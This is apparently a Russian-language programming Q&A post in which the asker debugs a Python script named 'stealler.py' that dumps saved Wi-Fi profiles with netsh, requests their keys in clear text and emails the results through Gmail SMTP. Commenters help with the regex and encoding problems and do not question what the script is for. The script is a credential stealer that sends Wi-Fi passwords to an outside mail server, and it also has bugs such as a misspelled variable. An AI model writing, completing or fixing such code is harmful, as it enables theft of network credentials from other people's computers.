# TypeError: 'NoneType' object is not iterable

Tags: python, wifi, re

вот код:

```
import subprocess
import smtplib
import re

def send_mail(email, password, message):
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(email, password)
    server.sendmail(email, email, message)
    server.quit()

command = "netsh wlan show profile"
networks = subprocess.check_output(command, shell=True)
networks = networks.decode('ISO-8859-1')
network_names_list = re.findall("(?:Все профили пользователей\s*:\s)(.*)", networks)

result = " "
for network_name in network_names_list:
    command = str("netsh wlan show profile " + network_name + "key=clear")
    current_result = subprocess.check_output(command, shell=True)
    result = rsult + current_result

send_mail("email", "password", result)
```

Программа запускает команду "netsh wlan show profile" и получает ответ в виде:

```
Профили интерфейса Беспроводное сетевое соединение:

Профили групповой политики (только чтение)
------------------------------------------
    <Отсутствует>

Профили пользователей
---------------------------
    Все профили пользователей     : RT-WiFi_4177
    Все профили пользователей     : famiss
    Все профили пользователей     : Florida
```

но программе для дальнейшего использования нужно только названия сетей и ничего лишнего, для этого я добавил библиотеку re и использовал функцию findall в строчке 15, но мне выдаёт ошибку:

```
Traceback (most recent call last):
  File "stealler.py", line 19, in <module>
    for network_name in network_names_list:
TypeError: 'NoneType' object is not iterable
```

Comment: если принтануть network_names_list то что там будет ?

Comment: Получается, что "re.findall("(?:Все профили пользователей\s*:\s)(.*)", networks)" возвращает "None". Скорее всего регулярка неправильно написана, либо просто совпадений нет.

Comment: по логике я всё верно сделал и совпадения должны были быть, поэтому я и прошу помощь, подскажите пожалуйста, как будет сделать вернее

Comment: Попробуй сделать raw string там, где регулярка. Так: "re.findall(r"(?:Все профили пользователей\s*:\s)(.*)", networks)"

Comment: мне просто приходят пустые сообщения, я попытался принтануть  network_names_list этой строкой: print(network_names_list.group(1)) , но выходит вот такая ошибка:

Comment: Traceback (most recent call last): File "stealler.py", line 16, in <module> print(network_names_list.group(1)) AttributeError: 'list' object has no attribute 'group'

Comment: Принтани `networks` сразу после объявления.

Comment: ?aRa?<? ?-a?aa?ca  ??a?aR?R¤-R? a?a??R? aR?¤?-?-??:

?aRa?<? ?aa??R?Rc ?R<?a??? (aR<i?R ca?-??)
------------------------------------------
    <?aaaaaa?a?a>

?aRa?<? ?R<i§R? a?<?c
---------------------------
    ?a? ?aRa?<? ?R<i§R? a?<?c     : RT-WiFi_4177
    ?a? ?aRa?<? ?R<i§R? a?<?c     : famiss
    ?a? ?aRa?<? ?R<i§R? a?<?c     : Florida